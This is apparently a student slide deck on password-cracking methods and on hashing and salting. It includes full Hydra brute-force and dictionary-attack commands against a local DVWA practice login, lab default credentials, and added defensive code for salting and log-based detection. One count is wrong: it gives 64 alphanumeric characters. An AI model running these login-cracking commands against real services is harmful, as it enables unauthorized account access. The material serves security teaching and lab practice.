cyber security project - unice.frdeptinfo.unice.fr/~bmartin/passwords.pdf · dvwa (damn vulnerable...
CYBER SECURITY PROJECT: PASSWORD CRACKING
BALLERIO SIMONE, GALASSO EMANUELE
Summary
THC Hydra
Password Cracking
Experiments
Password Cracking features
• Online Attack
• Offline Attack
• Dictionary Attack
• Brute Force
• Rainbow table
• Hybrid techniques
What is password cracking?
Password cracking is the process of attempting to gain unauthorized access to restricted systems using common passwords or algorithms that guess passwords.
How is a password stored?
Password → HASH FUNCTION → Hashed Password
Online VS Offline Cracking
Online: try a large number of username/password combinations against the login portal. Limited by the speed of the network.
Offline: get the password hashes and then crack them offline, trying to find the clear-text value that computes to each hash. Limited by the speed of the hacker’s machine.
Brute Force Attack
Depends only on the length of the password and on the system used.
Try all the possible combinations of characters.
We are 100% sure to find the password, but we don’t know how long the process will take.
Example Brute Force
PROBLEM
Let’s assume for a moment an environment where all systems have equal computing power, and that we have to find a password composed of only 8 alphanumeric characters. How many attempts do we have to make in the worst case?
Consideration
Alphanumeric characters are: a...z, A...Z, 0...9 = 64 possibilities.
We already know the username.
The solution depends only on the length of the password.
Knowing the exact length of the password always simplifies the job.
SOLUTION
$64^8$ possible combinations (dispositions with repetition: $D^r_{n,k} = n^k$)
Dictionary Attack
Depends on the complexity of the password and on whether it avoids ordinary, meaningful words.
Try all the strings in a pre-arranged listing.
There is less chance of arriving at a solution, but if we do, it is in a relatively short time.
Example Dictionary Attack
PROBLEM
Let’s consider a Dictionary Attack with the French dictionary, where there are roughly 135,000 words.
SOLUTION
We can find a common French password by trying just 135,000 times.
Rainbow table Attack
It is a pre-computed dictionary of plain text passwords and their corresponding hash values.
More than one text can produce the same hash, so it’s not important to know what the original password really was.
Salting passwords is a common method of preventing rainbow table attacks.
Salting Passwords
BOB and ALICE: SAME PASSWORD = SAME HASH STORED
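The Bob and Alice case from the slide, as an added example that is not part of the original slides: unsalted SHA-256 stores the same hash for both users and a precomputed table recovers it, while a per-user random salt fed into PBKDF2 does neither. The word list, the iteration count and the function names are assumptions made for this illustration.

```python
import hashlib
import hmac
import os

ITERATIONS = 600_000  # assumed PBKDF2 work factor for this illustration

def unsalted(password):
    # Storage as on the slide: the hash depends on the password alone.
    return hashlib.sha256(password.encode()).hexdigest()

def salted(password, salt=None):
    # A fresh random salt per user, fed with the password into a slow KDF.
    salt = os.urandom(16) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify(password, salt, digest):
    # Login check: recompute with the stored salt, compare in constant time.
    return hmac.compare_digest(salted(password, salt)[1], digest)

def precompute(words):
    # Plain hash -> password lookup; a rainbow table stores the same mapping
    # in compressed form.
    return {unsalted(w): w for w in words}

def demo():
    table = precompute(["123456", "password", "letmein"])  # constructed list
    bob, alice = unsalted("letmein"), unsalted("letmein")
    bob_salt, bob_hash = salted("letmein")
    alice_salt, alice_hash = salted("letmein")
    return {
        "unsalted_same": bob == alice,
        "unsalted_lookup": table.get(alice),
        "salted_same": bob_hash == alice_hash,
        "salted_lookup": table.get(alice_hash.hex()),
        "login_ok": verify("letmein", alice_salt, alice_hash),
        "login_wrong": verify("letmein1", alice_salt, alice_hash),
    }

if __name__ == "__main__":
    print(demo())
```

The salt is stored next to the hash; it does not need to be secret, only different for every user.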
Hybrid Attack
Hybrid Dictionary
Background knowledge Dictionary
Maximize your chances of success
Experiments
Tools
Kali Linux is an advanced penetration testing distribution
Hydra is a parallelized login cracker
Damn Vulnerable Web App
Kali Linux
Kali contains several hundred tools which are geared towards various information security tasks, such as:
• Penetration Testing
• Security research
• Computer Forensics
• Reverse Engineering
Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.
Hydra
• Is very fast and flexible
• New modules are easy to add
• Shows how easy it would be to gain unauthorized access to a system remotely
DVWA (Damn Vulnerable Web App)
Ethical hackers test their skills and run tools in a legal environment.
• For beginners and advanced users who want to prove their skills, DVWA is the best platform.
• This is the best place to do hacking.
• Helps web developers better understand the processes of securing web applications
Idea of Experiments
In the current experiments, password cracking is used to discover the [user-password] pair of the access credentials stored within the DVWA program.
Brute Force
hydra -L user.txt -x 1:5:a -F -w 10 -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jk"
In this case it is not possible to show the solution, because the number of password combinations is very high and the attack would therefore take a long time.
Dictionary Attack
With security=low:
hydra -l admin -P rockyou.txt -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=low; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"
With security=medium:
hydra -l admin -P rockyou.txt -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=hsn2d01480glgm9m2svtv9jkls"
• Low: This security level is completely vulnerable and has no security measures at all.
• Medium: This setting is mainly to give an example to the user of bad security practices, where the developer has tried but failed to secure an application.
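Seen from the defending side, as an added example that is not part of the original slides: the form above is submitted with GET, so every guess is a request line in the web server's access log, and a per-source rate check over that log flags runs like the ones shown. The log lines are constructed, and the 10-second window and the limit of 5 attempts are assumed values.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta
from urllib.parse import urlsplit, parse_qs

LINE = re.compile(r'(\S+) \S+ \S+ \[([^\]]+)\] "GET (\S+) [^"]*" \d{3}')
BRUTE_PATH = "/DVWA/vulnerabilities/brute/"  # path from the hydra commands above
WINDOW = timedelta(seconds=10)               # assumed alert thresholds
MAX_ATTEMPTS = 5

def parse(line):
    """Return (source_ip, time) for a request that submits the login form."""
    m = LINE.match(line)
    if not m:
        return None
    ip, stamp, target = m.groups()
    url = urlsplit(target)
    fields = parse_qs(url.query, keep_blank_values=True)
    if url.path != BRUTE_PATH or not fields.keys() >= {"username", "password"}:
        return None
    # The guessed password is in the URL and so in the log; it is not kept here.
    return ip, datetime.strptime(stamp, "%d/%b/%Y:%H:%M:%S %z")

def detect(lines):
    """Map each source IP to its peak attempts per WINDOW, if above the limit."""
    # Attempts are counted, not failures: the commands above tell success by
    # the response text (S=...), which the access log does not hold.
    recent, peak = defaultdict(deque), defaultdict(int)
    for line in lines:
        hit = parse(line)
        if hit is None:
            continue
        ip, when = hit
        window = recent[ip]
        window.append(when)
        while when - window[0] > WINDOW:
            window.popleft()
        peak[ip] = max(peak[ip], len(window))
    return {ip: n for ip, n in peak.items() if n > MAX_ATTEMPTS}

def sample_log():
    """Constructed Apache-style access-log lines (not from a real run)."""
    fmt = '{ip} - - [10/Mar/2020:10:00:{s:02d} +0000] "GET {path} HTTP/1.1" 200 4521'
    form = BRUTE_PATH + "?username=admin&password={}&Login=Login"
    fast = [fmt.format(ip="127.0.0.1", s=i // 2, path=form.format("x" * (i + 1)))
            for i in range(8)]
    slow = [fmt.format(ip="192.0.2.10", s=s, path=form.format("typo")) for s in (5, 50)]
    page = [fmt.format(ip="192.0.2.10", s=6, path="/DVWA/index.php")]
    return fast + slow + page
```

On the sample, `detect(sample_log())` reports only the source that sent eight guesses in four seconds; the two slow attempts and the ordinary page view are ignored.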
Other Possible Experiments
THC-Hydra supports many different services:
Afp, Cisco, Cvs, Firebird, Ftp, Http-get, Http-head, Http-proxy, Https-get, Https-head, Https-form-get, Https-form-post, Imap, Smb, Ldap2, Ldap3, Mssql, Mysql, Ncp, Nntp, Oracle-listener, Pcanywhere, Pop3, Postgres, Rexec, Snmp, Smtp, Telnet
CONCLUSION
• Use passwords that are at least 15 characters long.
• Don't use the same password for privileged user accounts between systems.
• Don't share it.
Thanks for the attention
How to test
VirtualBox: https://www.virtualbox.org/wiki/Downloads
Kali Linux: https://linoxide.com/distros/learn-method-install-kali-linux-virtualbox/
DVWA installation: https://medium.com/datadriveninvestor/setup-install-dvwa-into-your-linux-distribution-d76dc3b80357
If you have any type of problem during the installation, contact us and we will give you a .vdi file of the virtual machine with all the installations that you need.
Username: root
Password: toor
1. service apache2 start
2. service mysql start
http://127.0.0.1/DVWA/login.php
Username: admin
Password: password
Test it and have fun:
Pure Brute Force:
hydra -L user.txt -x 1:5:a -e ns -F -u -w 10 -v -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"
Dictionary Attack:
hydra -l admin -P rockyou.txt -F -V 127.0.0.1 http-get-form "/DVWA/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=medium; PHPSESSID=INSERT PHPSESSID"
Try: hydra -h, for more information
ENJOY!